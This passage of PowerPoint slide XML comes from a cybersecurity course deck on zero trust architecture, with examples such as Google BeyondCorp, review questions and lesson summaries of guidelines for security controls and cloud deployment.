          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BDE6752-37D9-9BB4-40EE-BDA358BF870C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1756228"/>
            <a:ext cx="9905999" cy="4862285"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Emerging Need for Zero Trust Architectures (ZTA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Deperimeterization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trends Driving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Deperimeterization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mobile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Outsourcing and Contracting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Wireless Networks (Wi-Fi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Key Benefits of a Zero Trust Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Greater security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Better access controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Improved governance and compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Increased granularity</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215184589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144B5-B788-C2B8-D0AA-2B04A9CA2554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Zero Trust Security Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 467">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7403F4F6-9F9B-7B72-6815-99A7CBC584FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1673199"/>
            <a:ext cx="8795658" cy="4883847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1222173960"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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DCF6E-3A88-9519-93CC-D7652941A2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="142268"/>
            <a:ext cx="9905998" cy="734032"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Zero Trust Architecture Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C718D292-A543-9E06-58E8-47292D1DD237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="445198509"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="514350" y="876300"/>
          <a:ext cx="10991849" cy="5839433"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2381250">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1217240753"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8610599">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3413837326"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="443578">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>Examples</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="321703033"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1567714">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Google </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>BeyondCorp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Google’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>BeyondCorp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> is a widely recognized</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID"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example of a zero trust security architecture. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>BeyondCorp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> uses a system of multiple security layers, including identity verification, device verification, and access control policies, to secure Google’s internal network. This has enabled Google to provide its employees with remote access to company resources while maintaining high security.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128686965"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1276047">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Joint Enterprise Defense Infrastructure (JEDI)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>The DoD’s JEDI cloud is a major project to modernize the department’s IT infrastructure. The JEDI cloud is based on a zero trust architecture that uses access control policies and other security measures to ensure that only authorized users and devices can access DoD resources.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2918726422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1276047">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cisco Zero Trust Architecture</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cisco has developed a comprehensive zero</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID"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trust security architecture incorporating network segmentation, access control policies, and threat detection and response capabilities. The architecture is designed to protect against a wide range of cyber threats, including insider threats and external attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2179670296"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1276047">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Palo Alto Networks Prisma Access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prisma Access is a cloud-delivered security service that uses a zero trust architecture to secure network traffic. It provides secure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID"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access to cloud and Internet resources while also preventing data exfiltration and other cyber threats.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2546935863"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8270579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BC76-BFD8-FC3B-D3E8-D278C01C43EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Embedded System and Zero Trust Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6966BA6-5FCA-D4F8-10EF-860508B8237F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4418014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is a purpose-specific operating system with designs heavily focused on high levels of stability and processing speed?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are the systems control machinery that is used in critical infrastructure, like power suppliers, water suppliers, health services, telecommunications, and national security services?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some factors contributing to the poor security characteristics of IoT devices?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is a network security approach that shifts the focus from defending a network’s boundaries to protecting individual resources and data within the network?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3479526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31891-BF40-3C2D-C320-FCFBAE1EDFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 1 - Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A478F0E9-4D7D-800D-BEBF-9677F702AD04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1866900"/>
            <a:ext cx="9905999" cy="4610099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Guidelines for Summarizing Security Concepts and Security Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Follow these guidelines when you assess the use of security controls and frameworks in your organization:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Create a security mission statement and supporting policies that emphasize the importance of the CIA triad: confidentiality, integrity, availability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Assign roles so that security tasks and responsibilities are clearly understood and that impacts to security are assessed and mitigated across the organization.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Consider creating business units, departments, or projects to support the security function, such as a SOC, CIRT, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Identify and assess the laws and industry regulations that impose compliance requirements on your business.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Select a framework that meets your organization’s compliance requirements and business needs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Create a matrix of security controls that are currently in place to identify categories and functions—consider deploying additional controls for any unmatched capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Perform a gap analysis to evaluate security capabilities against framework requirements and identify goals for developing additional cybersecurity competencies and improving overall information security assurance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413399185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17B1-1518-D0C0-19B8-D38D194A6308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 6 Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6FCE67-76C0-8E90-4774-88F48751983C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1868486"/>
            <a:ext cx="10383836" cy="4989514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Guidelines for Implementing Secure Cloud Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow these guidelines for deploying or extending the use of cloud and virtualization infrastructure:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assess requirements for availability and confidentiality that will determine the appropriate cloud deployment model (public, hosted private, private, community, or hybrid).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify a service provisioning model (software, platform, or infrastructure) that best fits the application requirement, given available development resources and the degree of customization required.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
